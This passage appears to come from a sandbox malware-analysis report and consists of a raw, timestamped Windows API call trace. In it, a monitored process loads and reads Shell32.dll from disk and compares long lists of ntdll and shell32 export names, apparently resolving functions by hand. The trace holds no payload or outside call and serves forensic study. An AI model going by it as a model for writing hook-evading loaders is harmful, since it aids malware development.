lpString2="A_SHAFinal") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0086.245] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.245] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0086.246] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0086.247] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0086.247] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0086.247] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0086.247] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0086.247] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0086.247] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0086.247] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0086.247] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0089.099] GetProcessHeap () returned 0x570000 [0089.099] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4179040 | out: hHeap=0x570000) returned 1 [0089.120] GetProcessHeap () returned 0x570000 [0089.120] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5893a0 [0089.120] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0089.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0089.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0089.121] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0089.121] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0089.122] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0089.122] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0089.122] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0089.122] GetProcessHeap () returned 0x570000 [0089.122] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1587258) returned 0x417a040 [0089.493] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0089.493] ReadFile (in: hFile=0x140, lpBuffer=0x417a040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x417a040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0092.744] CloseHandle (hObject=0x140) returned 1 [0092.744] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0092.744] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0092.744] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0092.745] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0092.745] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0092.745] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0092.745] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0092.745] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0092.745] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.745] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0092.745] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0092.745] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0092.745] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.745] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0092.745] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0092.745] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0092.745] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0092.745] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.745] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0092.745] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.745] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0092.746] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0092.746] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0092.746] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.746] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0092.746] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0092.746] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.746] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0092.746] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0092.746] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0092.746] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.746] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0092.746] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.746] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.746] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0092.746] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0092.746] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0092.746] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0092.746] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.746] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0092.746] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.746] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.746] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0092.747] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.747] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0092.747] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0092.747] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.748] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.748] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0092.748] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0092.748] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0092.748] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0092.748] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0092.748] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0092.748] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0092.749] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0092.750] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", 